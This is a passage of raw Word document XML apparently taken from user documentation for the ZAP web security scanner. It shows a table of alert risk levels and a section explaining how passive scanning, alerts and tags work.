                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="43697D68" w14:textId="5E600B11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="40AA4F5B" w14:textId="1A62C9D4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="764D761D" w:rsidTr="55820FFD" w14:paraId="5AAD1F2F">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="1966A56C" w14:textId="24436417">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="371C4506" w14:textId="064A8C77">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4"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidR="764D761D">
              <w:drawing>
                <wp:inline wp14:editId="28F9ACA5" wp14:anchorId="0AF25D68">
                  <wp:extent cx="152400" cy="152400"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1594531969" name="" title=""/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="R2b8579b0034d44f9">
                            <a:extLst>
                              <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="152400" cy="152400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidRPr="764D761D" w:rsidR="764D761D">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4"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="57867BB7" w14:textId="5D65B9B6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="764D761D" w:rsidTr="55820FFD" w14:paraId="1FDBE4B7">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="75A20D43" w14:textId="41CEB67B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="492DF8A3" w14:textId="3474EEC1">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4"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidR="764D761D">
              <w:drawing>
                <wp:inline wp14:editId="7693241A" wp14:anchorId="1647ACC2">
                  <wp:extent cx="152400" cy="152400"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="307390431" name="" title=""/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="R87c2388611a242a8">
                            <a:extLst>
                              <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="152400" cy="152400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidRPr="764D761D" w:rsidR="764D761D">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4"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="0513E642" w14:textId="0359D12E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="764D761D" w:rsidTr="55820FFD" w14:paraId="61AFDE5B">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="32BB374E" w14:textId="746908A3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="7E56B934" w14:textId="1E72C6CA">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4"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidR="764D761D">
              <w:drawing>
                <wp:inline wp14:editId="0070101D" wp14:anchorId="44B86FF4">
                  <wp:extent cx="152400" cy="152400"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1761893364" name="" title=""/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="Ra736dcfa08e949a4">
                            <a:extLst>
                              <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="152400" cy="152400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidRPr="764D761D" w:rsidR="764D761D">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4"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="6331DFEE" w14:textId="75B5895D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="764D761D" w:rsidTr="55820FFD" w14:paraId="7F0142B1">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="720F1BE4" w14:textId="140AD621">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="6F404100" w14:textId="2BEDFE25">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4"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidR="764D761D">
              <w:drawing>
                <wp:inline wp14:editId="50413B55" wp14:anchorId="53406AC6">
                  <wp:extent cx="152400" cy="152400"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="369470441" name="" title=""/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="R5dde91cc2bbe4122">
                            <a:extLst>
                              <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="152400" cy="152400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidRPr="764D761D" w:rsidR="764D761D">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4"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="4A4F05C1" w14:textId="53C84F4E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="764D761D" w:rsidTr="55820FFD" w14:paraId="4777AAB4">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="0FAA161B" w14:textId="0704E8B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="53C08C9D" w14:textId="5AE084EB">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4"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidR="764D761D">
              <w:drawing>
                <wp:inline wp14:editId="1E5BD6FB" wp14:anchorId="015E36A2">
                  <wp:extent cx="152400" cy="152400"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1602035819" name="" title=""/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="Rcbb11fa38d024bcc">
                            <a:extLst>
                              <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="152400" cy="152400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidRPr="764D761D" w:rsidR="764D761D">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4"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> False Positive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:sz="0"/>
              <w:bottom w:sz="0"/>
              <w:right w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="764D761D" w:rsidP="55820FFD" w:rsidRDefault="764D761D" w14:paraId="6DBE783D" w14:textId="296A16C7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="764D761D" w:rsidP="55820FFD" w:rsidRDefault="764D761D" w14:paraId="223235ED" w14:textId="073838B7">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="45E22297" w14:textId="6D8F1014">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="659F4F4D" w:rsidP="55820FFD" w:rsidRDefault="659F4F4D" w14:paraId="26A9D121" w14:textId="6C605C99">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="659F4F4D">
        <w:drawing>
          <wp:inline wp14:editId="79427D91" wp14:anchorId="784B7E3B">
            <wp:extent cx="4572000" cy="2457450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1244711770" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R5532b5472fbf4cd9">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5FA74828" w:rsidP="449E37A7" w:rsidRDefault="5FA74828" w14:paraId="1D8A6CA1" w14:textId="5D441BBD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="5FA74828">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Passive Scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5FA74828" w:rsidP="449E37A7" w:rsidRDefault="5FA74828" w14:paraId="69867400" w14:textId="6BE16E15">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5FA7482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ZAP by default passively scans all HTTP messages (requests and responses) sent to the web application being tested.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="5FA7482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Passive scanning does not change the requests nor the responses in any way and is therefore safe to use.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="5FA7482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Scanning is performed in a background thread to ensure that it does not slow down the exploration of an application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79CCF710" w:rsidP="449E37A7" w:rsidRDefault="79CCF710" w14:paraId="607ADA39" w14:textId="5564272C">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79CCF71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Passive scanning can also be used for automatically adding </w:t>
      </w:r>
      <w:hyperlink r:id="R27316b50e28f447c">
        <w:r w:rsidRPr="449E37A7" w:rsidR="79CCF710">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tags</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="449E37A7" w:rsidR="79CCF71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and raising </w:t>
      </w:r>
      <w:hyperlink r:id="Ra4ee13645099455b">
        <w:r w:rsidRPr="449E37A7" w:rsidR="79CCF710">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alerts</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="449E37A7" w:rsidR="79CCF71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for potential issues.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="79CCF71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A set of rules for automatic tagging are provided by default. These can be changed, </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="79CCF71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deleted</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="79CCF71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or added to via the </w:t>
      </w:r>
      <w:hyperlink r:id="R7c487016891e4264">
        <w:r w:rsidRPr="449E37A7" w:rsidR="79CCF710">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Options Passive Scan Tags screen</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="449E37A7" w:rsidR="79CCF71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p w:rsidR="7FAF5B52" w:rsidP="449E37A7" w:rsidRDefault="7FAF5B52" w14:paraId="4B1CB121" w14:textId="39547549">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="300" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7FAF5B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The alerts raised by passive scan rules can be configured using the </w:t>
      </w:r>
      <w:hyperlink r:id="Rac4c63e3460d4cfd">
        <w:r w:rsidRPr="449E37A7" w:rsidR="7FAF5B52">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Options Passive Scan Rules screen</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7FAF5B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br/>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="08F312A7">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Tags</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="08F312A7" w:rsidP="449E37A7" w:rsidRDefault="08F312A7" w14:paraId="361E944B" w14:textId="142E65FC">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A tag is </w:t>
      </w:r>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short</w:t>
      </w:r>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piece of text that you wish to associate with a request.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>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 request can have multiple tags associated with it.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>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Tags can be added and changed using the </w:t>
